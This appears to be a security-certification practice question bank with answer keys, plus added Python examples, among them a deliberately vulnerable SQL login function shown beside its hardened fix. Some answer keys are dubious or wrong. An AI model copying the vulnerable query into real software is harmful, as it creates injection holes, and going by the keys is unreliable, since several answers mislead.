Ann, an employee, is cleaning out her desk and disposes of paperwork containing confidential customer information in a recycle bin without shredding it first. This is MOST likely to increase the risk of loss from which of the following attacks? A. Shoulder surfing B. Dumpster diving C. Tailgating D. Spoofing
B. Dumpster diving
A systems administrator wants to implement a secure wireless network requiring wireless clients to pre-register with the company and install a PKI client certificate prior to being able to connect to the wireless network. Which of the following should the systems administrator configure? A. EAP-TTLS B. EAP-TLS C. EAP-FAST D. EAP with PEAP E. EAP with MSCHAPv2
B. EAP-TLS
A security analyst finished drafting an official response to a security assessment report, which must be sent to the head of the auditing department. The security analyst needs to assure the head of the auditing department that the response came from the security analyst, and the contents of the response must be kept confidential. Which of the following are the last steps the security analyst should perform prior to electronically sending the message? (Choose TWO) A. Hash the message. B. Encrypt the message. C. Digitally sign the message. D. Label the email as "Confidential" E. Perform key exchange with the recipient.
B. Encrypt the message. C. Digitally sign the message.
After recovering from a data breach in which customer data was lost, the legal team meets with the Chief Security Officer (CSO) to discuss ways to better protect the privacy of customer data. Which of the following controls support this goal? A. Contingency planning B. Encryption and stronger access control C. Hashing and non-repudiation D. Redundancy and fault tolerance
B. Encryption and stronger access control
Upon entering an incorrect password, the logon screen displays a message informing the user that the password does not match the username provided and is not the required length of 12 characters. Which of the following secure coding techniques should a security analyst address with the application developers to follow security best practices? A. Input validation B. Error handling C. Obfuscation D. Data exposure
B. Error handling
A security manager must remain aware of the security posture of each system. Which of the following supports this requirement? A. Training staff on security policies B. Establishing baseline reporting C. Installing anti-malware software D. Disabling unnecessary accounts/services
B. Establishing baseline reporting
You've been asked to conduct an internal vulnerability assessment for your organization. Which of the following steps should you avoid in determining system or network weaknesses to minimize risk? A. Non-intrusive reconnaissance B. Exploiting unpatched applications C. Review of system control configuration settings D. Scanning for unpatched systems
B. Exploiting unpatched applications
An organization is developing its mobile device management policies and procedures and is concerned about vulnerabilities associated with sensitive data being saved to a mobile device, as well as weak authentication when using a PIN. As part of the discussions on the topic, several solutions are proposed. Which of the following controls, when implemented together, will address the protection of data-at-rest as well as strong authentication? (Select TWO). A. Containerization B. FDE C. Remote wipe capability D. MDM E. MFA F. OTA updates
B. FDE E. MFA
A security analyst has received the following alert snippet from the HIDS appliance: PROTOCOL SIG SRC.PORT DST.PORT TCP XMAS SCAN 192.168.1.1:1091 192.168.1.2:8891 TCP XMAS SCAN 192.168.1.1:649 192.168.1.2:9001 TCP XMAS SCAN 192.168.1.1:2264 192.168.1.2:6455 TCP XMAS SCAN 192.168.1.1:3464 192.168.1.2:8744 Given the above logs, which of the following is the cause of the attack? A. The TCP ports on destination are all open. B. FIN, URG, and PSH flags are set in the packet header. C. TCP MSS is configured improperly. D. There is improper Layer 2 segmentation.
B. FIN, URG, and PSH flags are set in the packet header.
A vulnerability scan is reporting that patches are missing on a server. After a review, it is determined that the application requiring the patch does not exist on the operating system. Which of the following describes this cause? A. Application hardening B. False positive C. Baseline code review D. False negative
B. False positive
Company A has acquired Company B. Company A has different domains spread globally, and typically migrates its acquisitions' infrastructure under its own domain infrastructure. Company B, however, cannot be merged into Company A's domain infrastructure. Which of the following methods would allow the two companies to access one another's resources? A. Attestation B. Federation C. Single sign-on D. Kerberos
B. Federation
A company is preparing to decommission an offline, non-networked root certificate server. Before sending the server's drives to be destroyed by a contracted company, the Chief Security Officer (CSO) wants to be certain that the data will not be accessed. Which of the following, if implemented, would BEST reassure the CSO? (Select TWO). A. Disk hashing procedures B. Full disk encryption C. Data retention policies D. Disk wiping procedures E. Removable media encryption
B. Full disk encryption C. Data retention policies
After attempting to harden a web server, a security analyst needs to determine if an application remains vulnerable to SQL injection attacks. Which of the following would BEST assist the analyst in making this determination? A. tracert B. Fuzzer C. nslookup D. Nmap E. netcat
B. Fuzzer
A security analyst is doing a vulnerability assessment on a database server. The scanning tool returns the following information: Database: CustomerAccess1 Column: Password Data type: MD5 Hash Salted?: No There have been several security breaches on the web server that accesses this database. The security team is instructed to mitigate the impact of any possible breaches. The security team is also instructed to improve the security on this database by making it less vulnerable to offline attacks. Which of the following would BEST accomplish these goals? (Select TWO). A. Start using salts to generate MD5 password hashes. B. Generate password hashes using SHA-256. C. Force users to change passwords the next time they log on. D. Limit users to five attempted logons before they are locked out. E. Require the web server to only use TLS 1.2 encryption.
B. Generate password hashes using SHA-256 C. Force users to change passwords the next time they log on.
Which of the following types of penetration test will allow the tester to have access only to password hashes prior to the penetration test? A. Black box B. Gray box C. Credentialed D. White box
B. Gray box
A network administrator is configuring access control for the sales department which has high employee turnover. Which of the following is BEST suited when assigning user rights to individuals in the sales department? A. Time of day restrictions B. Group based privileges C. User assigned privileges D. Domain admin restrictions
B. Group based privileges
Which of the following protocols uses an asymmetric key to open a session and then establishes a symmetric key for the remainder of the session? A. SFTP B. HTTPS C. TFTP D. TLS
B. HTTPS
Your company's website has been defaced by an organization that doesn't agree with your corporate policies. What type of threat actor typically does this? A. Script kiddies B. Hacktivist C. Organized crime D. Insiders
B. Hacktivist
After entering the following information into a SOHO wireless router, a mobile device's user reports being unable to connect to the network: PERMIT 0A:D1:FA:B1:03:37 DENY 01:33:7F:AB:10:AB Which of the following is preventing the device from connecting? A. WPA2-PSK requires a supplicant on the mobile device. B. Hardware address filtering is blocking the device. C. TCP/IP Port filtering has been implemented on the SOHO router. D. IP address filtering has disabled the device from connecting
B. Hardware address filtering is blocking the device.
Jane, a security analyst, is reviewing logs from hosts across the Internet which her company uses to gather data on new malware. Which of the following is being implemented by Jane's company? A. Vulnerability scanner B. Honeynet C. Protocol analyzer D. Port scanner
B. Honeynet
Every morning, a systems administrator monitors failed login attempts on the company's log management server. The administrator notices the DBAdmin account has five failed username and/or password alerts during a ten-minute window. The systems administrator determines the user account is a dummy account used to attract attackers. Which of the following techniques should the systems administrator implement? A. Role-based access control B. Honeypot C. Rule-based access control D. Password cracker
B. Honeypot
Which of the following should an administrator implement to research current attack methodologies? A. Design reviews B. Honeypot C. Vulnerability scanner D. Code reviews
B. Honeypot
A security engineer is working with the CSIRT to investigate a recent breach of client data due to the improper use of cloud-based tools. The engineer finds that an employee was able to access a cloud-based storage platform from the office and upload data for the purposes of doing work from home after hours. Such activity is prohibited by policy, but no preventive control is in place to block such activities. Which of the following controls would have prevented this breach? A. Network-based IPS B. Host-based DLP C. Host-based IDS D. NAC using TACACS+
B. Host-based DLP
Which of the following would an online retailer consider when selecting a backup facility, should there be a natural disaster that destroys its existing production datacenter? A. Off-site backups B. Hot site C. Warm site D. Cold site
B. Hot site
A company has proprietary mission critical devices connected to their network which are configured remotely by both employees and approved customers. The administrator wants to monitor device security without changing their baseline configuration. Which of the following should be implemented to secure the devices without risking availability? A. Host-based firewall B. IDS C. IPS D. Honeypot
B. IDS
A company wishes to move all of its services and applications to a cloud provider but wants to maintain full control of the deployment access provisions of its services. Which of the following BEST represents the required cloud deployment model? A. SaaS B. IaaS C. MaaS D. Hybrid E. Private
B. IaaS
An organization wants to move its operations to the cloud. The organization's systems administrator will still maintain control of the servers, firewalls and load balancers in the cloud environment. Which of the following models is the organization considering? A. SaaS B. IaaS C. PaaS D. MaaS
B. IaaS
Pete's corporation has outsourced help desk services to a large provider. Management has published a procedure that requires all users, when receiving support, to call a special number. Users then need to enter the code provided to them by the help desk technician prior to allowing the technician to work on their PC. Which of the following does this procedure prevent? A. Collusion B. Impersonation C. Pharming D. Transitive Access
B. Impersonation
A security administrator learns that PII, which was gathered by the organization, has been found in an open forum. As a result, several C-level executives found their identities were compromised, and they were victims of a recent whaling attack. Which of the following would prevent these problems in the future? (Select TWO). A. Implement a reverse proxy. B. Implement an email DLP. C. Implement a spam filter. D. Implement a host-based firewall. E. Implement a HIDS.
B. Implement an email DLP. C. Implement a spam filter.
As part of a new BYOD rollout, a security analyst has been asked to find a way to securely store company data on personal devices. Which of the following would BEST help to accomplish this? A. Require the use of an eight-character PIN. B. Implement containerization of company data. C. Require annual AUP sign-off. D. Use geofencing tools to unlock devices while on the premises.
B. Implement containerization of company data.
A security analyst identified a SQL injection attack. Which of the following is the FIRST step in remediating the vulnerability? A. Implement stored procedures. B. Implement input validations. C. Implement proper error handling. D. Implement a WAF.
B. Implement input validations.
During a recent audit, several undocumented and unpatched devices were discovered on the internal network. Which of the following can be done to prevent similar occurrences? A. Run weekly vulnerability scans and remediate any missing patches on all company devices B. Implement rogue device detection and configure automated alerts for new devices C. Install DLP controls and prevent the use of USB drives on devices D. Configure the WAPs to use NAC and refuse connections that do not pass the health check
B. Implement rogue device detection and configure automated alerts for new devices
When considering a vendor-specific vulnerability in critical industrial control systems which of the following techniques supports availability? A. Deploying identical application firewalls at the border B. Incorporating diversity into redundant design C. Enforcing application white lists on the support workstations D. Ensuring the systems' anti-virus definitions are up-to-date
B. Incorporating diversity into redundant design
Which of the following are the primary differences between an incremental and differential backup? (Select TWO). A. Incremental backups take more time to complete. B. Incremental backups take less time to complete. C. Differential backups only back up files since the last full backup. D. Differential backups use less disk space on the storage drive. E. Incremental backups are less secure than differential backups. F. Differential backups are faster than incremental backups.
B. Incremental backups take less time to complete. C. Differential backups only back up files since the last full backup.
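The difference in the two answers above, worked through as an added example that is not part of the original study set: a small simulation of a week of nightly backups over a constructed file set with made-up modification times. It shows what each scheme copies each night (incremental: changed since the previous run; differential: changed since the last full) and which backup sets a restore has to read back.

```python
from datetime import datetime, timedelta

# Constructed data: a Sunday 01:00 full backup and the last-modified time of four files.
FULL_BACKUP = datetime(2024, 6, 2, 1, 0)
FILES = {
    "ledger.db":   datetime(2024, 6, 3, 10, 0),   # edited Monday
    "report.docx": datetime(2024, 6, 4, 10, 0),   # edited Tuesday
    "notes.txt":   datetime(2024, 6, 5, 10, 0),   # edited Wednesday
    "archive.zip": datetime(2024, 5, 30, 9, 0),   # untouched since before the full
}

def files_in_window(files, after, until):
    """Files modified after one point in time and no later than another."""
    return sorted(p for p, mtime in files.items() if after < mtime <= until)

def nightly_runs(files, full_time, nights):
    """Simulate `nights` backups at 01:00 following the full backup.
    Incremental copies what changed since the previous run of any kind;
    differential copies everything changed since the last full.
    Returns a list of (weekday, incremental_files, differential_files)."""
    runs, last_run = [], full_time
    for n in range(1, nights + 1):
        now = full_time + timedelta(days=n)
        runs.append((now.strftime("%a"),
                     files_in_window(files, last_run, now),
                     files_in_window(files, full_time, now)))
        last_run = now
    return runs

def restore_chain(runs, scheme):
    """Backup sets needed to restore to the state after the last night:
    the full plus every non-empty incremental, or the full plus only the latest differential."""
    if scheme == "incremental":
        return ["full"] + [day for day, inc, _ in runs if inc]
    if scheme == "differential":
        return ["full", runs[-1][0]]
    raise ValueError(scheme)
```

The differential set grows every night until the next full, which is why it takes longer and uses more space than that night's incremental, and why a restore from it needs only two sets instead of the whole chain.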
Which of the following is the below pseudo-code an example of? IF VARIABLE (CONTAINS NUMBERS = TRUE) THEN EXIT A. Buffer overflow prevention B. Input validation C. CSRF prevention D. Cross-site scripting prevention
B. Input validation
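How that remediation looks in code, as an added example that is not part of the original study set; it serves both the SQL injection question above and the input validation pseudo-code. It uses an in-memory SQLite table with made-up users, shows the string-built query that produces the `' OR '1'='1` alert, and then the hardened version that allow-lists the input (the pseudo-code's idea) and binds it as a parameter. Table contents and credentials are constructed for the example.

```python
import re
import sqlite3

def make_db():
    """Constructed in-memory users table with made-up rows (example data only)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    return conn

def login_vulnerable(conn, username, password):
    """The defect: user input is pasted into the SQL text, so it is parsed as SQL.
    Kept only to show what the analyst's alert looks like at the code level."""
    sql = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    return sorted(row[0] for row in conn.execute(sql))

# Allow-list for the login form, the same idea as the pseudo-code above:
# anything outside letters and digits is rejected before it reaches the database.
USERNAME_RE = re.compile(r"[A-Za-z0-9]{1,32}")

def validate_username(username):
    return bool(USERNAME_RE.fullmatch(username))

def login_hardened(conn, username, password):
    """Validate first, then bind values as parameters: data can never become SQL syntax.
    (Passwords are stored in clear here only to keep the example short; a real system
    stores a salted, slow hash and compares against that.)"""
    if not validate_username(username):
        return []
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return sorted(row[0] for row in conn.execute(sql, (username, password)))
```

Validation is the first step because it shrinks the attack surface immediately and cheaply; parameterised queries are what actually make the injection impossible, so both belong in the fix.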
Which of the following threats has sufficient knowledge to cause the MOST danger to an organization? A. Competitors B. Insiders C. Hacktivists D. Script kiddies
B. Insiders
Which of the following should Matt, a security administrator, include when encrypting smartphones? (Select TWO). A. Steganography images B. Internal memory C. Master boot records D. Removable memory cards E. Public keys
B. Internal memory D. Removable memory cards
A software developer is responsible for writing the code on an accounting application. Another software developer is responsible for developing code on a system in human resources. Once a year they have to switch roles for several weeks. Which of the following practices is being implemented? A. Mandatory vacations B. Job rotation C. Least privilege D. Separation of duties
B. Job rotation
A company is looking for an authentication protocol that uses tickets and time stamps to ensure the validity of requests and to prevent replay attacks. Which of the following would be BEST suited to meet this requirement? A. TACACS+ B. Kerberos C. RADIUS D. MSCHAP
B. Kerberos
Which of the following is a security concern regarding users bringing personally-owned devices that they connect to the corporate network? A. Cross-platform compatibility issues between personal devices and server-based applications B. Lack of controls in place to ensure that the devices have the latest system patches and signature files C. Non-corporate devices are more difficult to locate when a user is terminated D. Non-purchased or leased equipment may cause failure during the audits of company-owned assets
B. Lack of controls in place to ensure that the devices have the latest system patches and signature files
Legal authorities notify a company that its network has been compromised for the second time in two years. The investigation shows the attackers were able to use the same vulnerability on different systems in both attacks. Which of the following would have allowed the security team to use historical information to protect against the second attack? A. Key risk indicators B. Lessons learned C. Recovery point objectives D. Tabletop exercise
B. Lessons learned
An analyst is currently looking at the following output:
Software Name   Status     Licensed   Used
Software 1      Approved   100        91
Software 2      Approved   50         52
Software 3      Approved   100        87
Software 4      Approved   50         46
Software 5      Denied     0          0
Which of the following security issues has been discovered based on the output? A. Insider threat B. License compliance violation C. Unauthorized software D. Misconfigured admin permissions
B. License compliance violation
Which of the following technologies uses multiple devices to share work? A. Switching B. Load balancing C. RAID D. VPN concentrator
B. Load balancing
Which of the following algorithms has well documented collisions? (Select TWO). A. AES B. MD5 C. SHA D. SHA-256 E. RSA
B. MD5 C. SHA (meaning SHA-1; SHA-256 has no known collisions, and AES and RSA are ciphers, not hash functions)
Joe, an employee, was escorted from the company premises due to suspicion of revealing trade secrets to a competitor. Joe had already been working for two hours before leaving the premises. A security technician was asked to prepare a report of files that had changed since last night's integrity scan. Which of the following could the technician use to prepare the report? (Select TWO). A. PGP B. MD5 C. ECC D. AES E. Blowfish F. HMAC
B. MD5 F. HMAC
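One way to produce that report, as an added example that is not part of the study set: a keyed baseline (HMAC-SHA-256) taken over a constructed file set the night before, re-computed in the morning and diffed. The key, paths and file contents are made up for the example. A plain MD5 list, as in the answer, is enough to spot accidental change; the keyed tag additionally stops someone who can edit a file from re-computing its recorded hash to match.

```python
import hmac
import hashlib

# Constructed snapshots of a file set (path -> contents); all data is made up.
LAST_NIGHT = {
    "/srv/docs/roadmap.docx": b"Q3 roadmap v1",
    "/srv/docs/pricing.xlsx": b"pricing table",
    "/srv/docs/readme.txt": b"internal use only",
}
THIS_MORNING = {
    "/srv/docs/roadmap.docx": b"Q3 roadmap v1",
    "/srv/docs/pricing.xlsx": b"pricing table, exported",   # modified
    "/srv/docs/competitor_notes.txt": b"copied out",          # new
    # readme.txt deleted
}
# Hypothetical key; in practice it lives off-host so an attacker cannot forge tags.
INTEGRITY_KEY = b"example-only-integrity-key"

def tag(data, key=INTEGRITY_KEY):
    """Keyed tag instead of a bare digest: editing the file and re-hashing it is not enough."""
    return hmac.new(key, data, hashlib.sha256).hexdigest()

def baseline(files, key=INTEGRITY_KEY):
    """Tag every file; this is what the nightly integrity scan stores."""
    return {path: tag(data, key) for path, data in files.items()}

def diff_report(old, new):
    """Compare two baselines; returns sorted lists of changed, added and removed paths."""
    changed = sorted(p for p in old if p in new and not hmac.compare_digest(old[p], new[p]))
    added = sorted(p for p in new if p not in old)
    removed = sorted(p for p in old if p not in new)
    return {"changed": changed, "added": added, "removed": removed}
```

The morning report is `diff_report(baseline(LAST_NIGHT), baseline(THIS_MORNING))`; the baseline itself should be kept somewhere the suspect could not have altered, or the comparison proves nothing.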
A security administrator is configuring a RADIUS server for wireless authentication. The configuration must ensure client credentials are encrypted end-to-end between the client and the authenticator. Which of the following protocols should be configured on the RADIUS server? (Select TWO). A. PAP B. MSCHAP C. PEAP D. NTLM E. SAML
B. MSCHAP C. PEAP
Which of the following refers to the term used to restore a system to its operational state? A. MTBF B. MTTR C. RTO D. RPO
B. MTTR
A systems administrator is configuring a system that uses data classification labels. Which of the following will the administrator need to implement to enforce access control? A. Discretionary access control B. Mandatory access control C. Role-based access control D. Rule-based access control
B. Mandatory access control
Pete, an IT Administrator, needs to secure his server room. Which of the following mitigation methods would provide the MOST physical protection? A. Sign in and sign out logs B. Mantrap C. Video surveillance D. HVAC
B. Mantrap
During the information gathering stage of deploying a role-based access control model, which of the following information is MOST likely required? A. Conditional rules under which certain systems may be accessed B. Matrix of job titles with required access privileges C. Clearance levels of all company personnel D. Normal hours of business operation
B. Matrix of job titles with required access privileges
Matt, a security analyst, needs to implement encryption for company data and also prevent theft of company data. Where and how should Matt meet this requirement? A. Matt should implement access control lists and turn on EFS. B. Matt should implement DLP and encrypt the company database. C. Matt should install Truecrypt and encrypt the company server. D. Matt should install TPMs and encrypt the company database.
B. Matt should implement DLP and encrypt the company database.
Which of the following passwords is the LEAST complex? A. MyTrain!45 B. Mytr@in!! C. MyTr@in12 D. MyTr@in#8
B. Mytr@in!!
An encrypted message is sent using PKI from Sara, a client, to a customer. Sara claims she never sent the message. Which of the following aspects of PKI BEST ensures the identity of the sender? A. CRL B. Non-repudiation C. Trust models D. Recovery agents
B. Non-repudiation
Compared to a non-credentialed scan, which of the following is a unique result of a credentialed scan? A. Uncommon open ports on the host B. Outdated software versions on the host C. Self-signed certificate on the host D. Fully qualified domain name
B. Outdated software versions on the host
A security administrator wants to implement least privilege access to a network share that stores sensitive company data. The organization is particularly concerned with the integrity of data and implements discretionary access control. The following controls are available: Read = a user can read the content of an existing file. Write = a user can modify the content of an existing file and delete an existing file. Create = a user can create a new file and place data in the file. A missing control means the user does not have that access. Which of the following configurations provides the appropriate control to support the organization's requirements? A. Owners: Read, Write, Create; Group Members: Read, Write; Others: Read, Write B. Owners: Read, Write, Create; Group Members: Read, Write, Create; Others: Read C. Owners: Read, Write; Group Members: Read, Create; Others: Read, Create D. Owners: Write, Create; Group Members: Read, Create; Others: Read, Write, Create
B. Owners: Read, Write, Create Group Members: Read, Write, Create Others: Read
A security manager is creating an account management policy for a global organization with sales personnel who must access corporate network resources while traveling all over the world. Which of the following practices is the security manager MOST likely to enforce with the policy? (Select TWO) A. Time-of-day restrictions B. Password complexity C. Location-based authentication D. Group-based access control E. Standard naming convention
B. Password complexity D. Group-based access control
An administrator discovers that many users have used their same passwords for years even though the network requires that the passwords be changed every six weeks. Which of the following, when used together, would BEST prevent users from reusing their existing password? (Select TWO). A. Length of password B. Password history C. Minimum password age D. Password expiration E. Password complexity F. Non-dictionary words
B. Password history C. Minimum password age
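A policy checker for the password questions above (the least complex candidate, and password history combined with minimum age), as an added example that is not part of the study set. It scores candidates by character classes, then enforces history and minimum age together and shows why history on its own does not stop the reuse the administrator found. Account records, salts, sample passwords and the policy defaults are constructed for the example.

```python
import hashlib
import hmac
import os
import re
from datetime import datetime, timedelta

CLASSES = {
    "upper": re.compile(r"[A-Z]"),
    "lower": re.compile(r"[a-z]"),
    "digit": re.compile(r"[0-9]"),
    "symbol": re.compile(r"[^A-Za-z0-9]"),
}

def character_classes(password):
    """Which of the four character classes a password draws from."""
    return {name for name, rx in CLASSES.items() if rx.search(password)}

def least_complex(candidates):
    """Rank by number of classes, then length; returns the weakest candidate."""
    return min(candidates, key=lambda p: (len(character_classes(p)), len(p)))

def fingerprint(password, salt):
    """Per-account salted digest kept for the history check. (A real system reuses its
    slow password hash here; plain SHA-256 keeps the example short.)"""
    return hashlib.sha256(salt + password.encode()).hexdigest()

def new_account(password, changed_at):
    """Constructed account record: random salt, fingerprint history, last change time."""
    salt = os.urandom(16)
    return {"salt": salt, "history": [fingerprint(password, salt)], "last_changed": changed_at}

class PasswordPolicy:
    def __init__(self, min_length=8, min_classes=3, history=5, min_age_days=1, max_age_days=42):
        self.min_length, self.min_classes, self.history = min_length, min_classes, history
        self.min_age, self.max_age = timedelta(days=min_age_days), timedelta(days=max_age_days)

    def expired(self, account, now):
        """Expiration alone forces a change; it says nothing about what the new value is."""
        return now - account["last_changed"] >= self.max_age

    def violations(self, account, new_password, now):
        """Every reason a change would be refused; an empty list means it is allowed."""
        problems = []
        if len(new_password) < self.min_length:
            problems.append("length")
        if len(character_classes(new_password)) < self.min_classes:
            problems.append("complexity")
        if now - account["last_changed"] < self.min_age:
            problems.append("minimum age")
        fp = fingerprint(new_password, account["salt"])
        if any(hmac.compare_digest(fp, old) for old in account["history"][-self.history:]):
            problems.append("history")
        return problems

def change_password(policy, account, new_password, now):
    problems = policy.violations(account, new_password, now)
    if not problems:
        account["history"].append(fingerprint(new_password, account["salt"]))
        account["last_changed"] = now
    return problems

def cycle_back(policy, account, old_password, fillers, now):
    """The trick behind the administrator's finding: rotate through throwaway passwords
    in one sitting, then set the old one again. True if the old password is accepted."""
    for filler in fillers:
        change_password(policy, account, filler, now)
    return change_password(policy, account, old_password, now) == []

# Constructed scenario: an account last changed a week ago and five throwaway passwords.
NOW = datetime(2024, 6, 10, 9, 0)
WEEK = timedelta(days=7)
FILLERS = ["Spring#2024a", "Summer#2024b", "Autumn#2024c", "Winter#2024d", "Monsoon#2024e"]

def demo(policy, old="MyTr@in12", fillers=FILLERS, now=NOW):
    """Does `policy` let the user return to `old` right after cycling through `fillers`?"""
    return cycle_back(policy, new_account(old, now - WEEK), old, fillers, now)
```

With `min_age_days=0` the history of five is exhausted in a minute and the old password comes straight back; with a one-day minimum age the second change of the sitting is refused, so the history can only be cleared over as many days as it is deep.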
Which of the following assessments would Pete, the security administrator, use to actively test that an application's security controls are in place? A. Code review B. Penetration test C. Protocol analyzer D. Vulnerability scan
B. Penetration test
Which of the following is the BEST approach to perform risk mitigation of user access control rights? A. Conduct surveys and rank the results. B. Perform routine user permission reviews. C. Implement periodic vulnerability scanning. D. Disable user accounts that have not been used within the last two weeks.
B. Perform routine user permission reviews.
The Chief Executive Officer (CEO) has asked a junior technician to create a folder in which the CEO can place sensitive files. The technician later finds the information within these files is the topic of conversation around the company. When this information gets back to the CEO, the technician is called in to explain. Which of the following MOST likely occurred? A. Access violations B. Permission issues C. Data exfiltration D. Certificate issues
B. Permission issues
A third-party penetration testing company was able to successfully use an ARP cache poison technique to gain root access on a server. The tester successfully moved to another server that was not in the original network. Which of the following is the MOST likely method used to gain access to the other host? A. Backdoor B. Pivoting C. Persistence D. Logic bomb
B. Pivoting
In initially conducting a penetration test, you find vulnerabilities on a separate, less secure server on the same network as the one you're investigating. You use access to that server to then attack the target servers. This type of exploit is known as: A. Escalation of privileges B. Pivoting C. Active reconnaissance D. Persistence
B. Pivoting
Due to issues with building keys being duplicated and distributed, a security administrator wishes to change to a different security control regarding a restricted area. The goal is to provide access based upon facial recognition. Which of the following will address this requirement? A. Set up mantraps to avoid tailgating of approved users. B. Place a guard at the entrance to approve access. C. Install a fingerprint scanner at the entrance. D. Implement proximity readers to scan users' badges.
B. Place a guard at the entrance to approve access.
A security engineer is making changes to a corporate network to facilitate the expansion of corporate connectivity to guest users. The security engineer is concerned with unauthorized users accessing sensitive systems that also require network connectivity. Given the engineer's requirements, which of the following is the BEST method of securing the sensitive systems? A. Place the sensitive systems in an isolated VLAN. B. Place an air gap around the sensitive systems. C. Virtualize the guest wireless infrastructure. D. Place the guest WAPs on a honeypot.
A. Place the sensitive systems in an isolated VLAN. (An air gap would isolate them but contradicts the stated requirement that the sensitive systems keep network connectivity; an isolated VLAN with restrictive inter-VLAN filtering meets both the isolation goal and the connectivity requirement.)
A technician is evaluating malware that was found on the enterprise network. After reviewing samples of the malware binaries, the technician finds each has a different hash associated with it. Which of the following types of malware is MOST likely present in the environment? A. Trojan B. Polymorphic worm C. Rootkit D. Logic bomb E. Armored virus
B. Polymorphic worm
During which of the following phases of the Incident Response process should a security administrator define and implement general defense against malware? A. Lessons Learned B. Preparation C. Eradication D. Identification
B. Preparation
A company is allowing a BYOD policy for its staff. Which of the following is a best practice that can decrease the risk of users jailbreaking mobile devices? A. Install a corporately monitored mobile antivirus on the devices. B. Prevent the installation of applications from a third-party application store. C. Build a custom ROM that can prevent jailbreaking. D. Require applications to be digitally signed.
B. Prevent the installation of applications from a third-party application store.
After Matt, a user, enters his username and password at the login screen of a web enabled portal, the following appears on his screen: `Please only use letters and numbers on these fields' Which of the following is this an example of? A. Proper error handling B. Proper input validation C. Improper input validation D. Improper error handling
B. Proper input validation
Pete, the system administrator, has blocked users from accessing social media web sites. In addition to protecting company information from being accidentally leaked, which additional security benefit does this provide? A. No competition with the company's official social presence B. Protection against malware introduced by banner ads C. Increased user productivity based upon fewer distractions D. Elimination of risks caused by unauthorized P2P file sharing
B. Protection against malware introduced by banner ads
Matt, an administrator, notices a flood of fragmented packets and retransmits from an email server. After disabling the TCP offload setting on the NIC, Matt sees normal traffic with packets flowing in sequence again. Which of the following utilities was he MOST likely using to view this issue? A. Spam filter B. Protocol analyzer C. Web application firewall D. Load balancer
B. Protocol analyzer
A systems administrator wants to generate a self-signed certificate for an internal website. Which of the following steps should the systems administrator complete prior to installing the certificate on the server? A. Provide the private key to a public CA. B. Provide the public key to the internal CA. C. Provide the public key to a public CA. D. Provide the private key to the internal CA. E. Provide the public/private key pair to the internal CA. F. Provide the public/private key pair to a public CA.
B. Provide the public key to the internal CA. (Strictly, a self-signed certificate is signed with the site's own private key and involves no CA at all; a certificate issued by the internal CA is CA-signed rather than self-signed. In either case the private key stays on the server and is never handed to a CA, which is why options A, D, E and F are wrong regardless.)
A user was reissued a smart card after the previous smart card had expired. The user is able to log into the domain but is now unable to send digitally signed or encrypted email. Which of the following would the user need to perform? A. Remove all previous smart card certificates from the local certificate store. B. Publish the new certificates to the global address list. C. Make the certificates available to the operating system. D. Recover the previous smart card certificates.
B. Publish the new certificates to the global address list.
Multiple organizations operating in the same vertical want to provide seamless wireless access for their employees as they visit the other organizations. Which of the following should be implemented if all the organizations use the native 802.1x client on their mobile devices? A. Shibboleth B. RADIUS federation C. SAML D. OAuth E. OpenlD connect
B. RADIUS federation
Matt, a security consultant, has been tasked with increasing server fault tolerance and has been given no budget to accomplish his task. Which of the following can Matt implement to ensure servers will withstand hardware failure? A. Hardware load balancing B. RAID C. A cold site D. A host standby
B. RAID
Which of the following may significantly reduce data loss if multiple drives fail at the same time? A. Virtualization B. RAID C. Load balancing D. Server clustering
B. RAID
Which of the following ciphers would be BEST used to encrypt streaming video? A. RSA B. RC4 C. SHA1 D. 3DES
B. RC4 (the intended point is that a stream cipher suits streaming data; RC4 itself is broken and prohibited in TLS by RFC 7465, so a current design would use AES-GCM or ChaCha20 instead)
Which of the following is used to encrypt web application data? A. RSA B. RC4 C. SHA D. DHA
B. RC4
While browsing an external website, a human resources manager opens several links in new browser tabs to review later. After browsing for 20 minutes, a full-screen message appears in a completely new browser window with a critical error code and a help desk number to call. At the same time, an audio message plays over the laptop speaker, describing a critical error and warning that the IP address of the laptop will be locked until the critical issue is resolved. The human resources manager is unable to escape out of the error message, and the keyboard is not responsive. After alerting the security team, the human resources manager held down the power button to turn off the laptop and then power it back on which rectifies the issue. Which of the following BEST describes the type of attack the human resources manager is experiencing? A. Spyware B. Ransomware C. Adware D. Logic bomb
B. Ransomware
A bank has recently deployed mobile tablets to all loan officers for use at customer sites. Which of the following would BEST prevent the disclosure of customer data in the event that a tablet is lost or stolen? A. Application control B. Remote wiping C. GPS D. Screen-locks
B. Remote wiping
When attempting to secure a mobile workstation, which of the following authentication technologies rely on the user's physical characteristics? (Select TWO) A. MAC address table B. Retina scan C. Fingerprint scan D. Two-factor authentication E. CAPTCHA F. Password string
B. Retina scan C. Fingerprint scan
A system security analyst using an enterprise monitoring tool notices an unknown internal host exfiltrating files to several foreign IP addresses. Which of the following would be an appropriate mitigation technique? A. Disabling unnecessary accounts B. Rogue machine detection C. Encrypting sensitive files D. Implementing antivirus
B. Rogue machine detection
A security administrator is analyzing a user report in which the computer exhibits odd network-related outages. The administrator, however, does not see any suspicious processes running. A prior technician's notes indicate the machine has been remediated twice, but the system still exhibits odd behavior. Files were deleted from the system recently. Which of the following is the MOST likely cause of this behavior? A. Crypto-malware B. Rootkit C. Logic bomb D. Session hijacking
B. Rootkit
An analyst receives an alert from the SIEM showing an IP address that does not belong to the assigned network can be seen sending packets to the wrong gateway. Which of the following network devices is misconfigured and which of the following should be done to remediate the issue? A. Firewall; implement an ACL on the interface B. Router; place the correct subnet on the interface C. Switch; modify the access port to trunk port D. Proxy; add the correct transparent interface
B. Router; place the correct subnet on the interface
Which of the following is an XML based open standard used in the exchange of authentication and authorization information between different parties? A. LDAP B. SAML C. TACACS+ D. Kerberos
B. SAML
As part of a corporate merger, two companies are combining resources. As a result, they must transfer files through the internet in a secure manner. Which of the following protocols would BEST meet this objective? (Select Two) A. LDAPS B. SFTP C. HTTPS D. DNSSEC E. SRTP
B. SFTP C. HTTPS
A recent vulnerability scan found that Telnet is enabled on all network devices. Which of the following protocols should be used instead of Telnet? A. SCP B. SSH C. SFTP D. SSL
B. SSH
